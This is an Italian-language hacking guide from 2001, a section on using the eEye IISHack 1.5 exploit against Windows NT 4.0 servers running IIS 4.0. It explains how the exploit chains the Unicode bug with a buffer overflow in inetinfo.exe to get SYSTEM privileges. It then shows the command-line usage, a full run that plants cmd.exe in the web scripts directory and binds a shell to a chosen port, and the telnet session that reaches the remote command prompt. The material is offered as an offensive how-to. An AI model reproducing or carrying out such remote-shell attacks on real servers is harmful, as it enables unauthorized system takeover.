Agosto-2001

            
                            .:La Grande Guida AllHacking Di IIS:.            
                                                                                
                                       [realizzata da]                          
                       ___                                                      
                      /     __   __  |/  |__   __   __  |/   ___   __           
                      \___ (__) (__) |\ |__) (__) (__) |\ (__/_ |  '          
                                                                                
                                                                                
                                            ___                                 
                                           (__/_                                
                                                                                
                     _                                                          
                    |_  ___  |   _|_   __   __    __  __   __   __              
                    |  (__/_ |_,  |_, (__) |  ) __)  |__) |  ' (__( (__|        
                                                     |                _|        
            

2.6 IISHack

[Sistemi vulnerabili: Windows NT 4.0 IIS 4.0 con sp6]

[Exploit: IISHack 1.5 (http://www.eeye.com/html/advisories/IISHack1.5.zip)]

[Vulnerabilit]

Questo exploit in C sfrutta un buffer overflow in inetinfo.exe e l'unicode bug per farci eseguire  dei comandi come SYSTEM. Cerchiamo di capire come funziona.
L'Unicode Bug usato da solo ci permette di eseguire dei comandi in remoto come IUSR_MACHINE, ma se noi lo usiamo per sfruttare il buffer overflow prima citato (exploit normalmente locale) guadagneremo accesso come SYSTEM! 8o]

[Exploit]

L'IISHack creer una shell DOS su una porta a nostro piacere.

C:\>IISHack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Usage: IISHack1.5 [server] [server-port] [trojan-port]


Esempio:

IISHack1.5.exe www.server.com 80 1717
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.server.com on port 1717 and you
should get a cmd prompt.

Ora ci connettiamo con telnet al server sulla porta definita (1717 in questo caso) ed avremo a nostra disposizione un Prompt dei comandi:

C:\> telnet www.server.com 1717
Trying www.server.com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp


                           _________________________________________
                          [                                         ]
                          [            Copyright (C) 2001           ]
                          [                                         ]
                          [ FeltonSpray  - feltonspray@katamail.com ]
                          [                                         ]
                          [   Cookbooker - cookbooker@libero.it     ]
                          [                                         ]
                           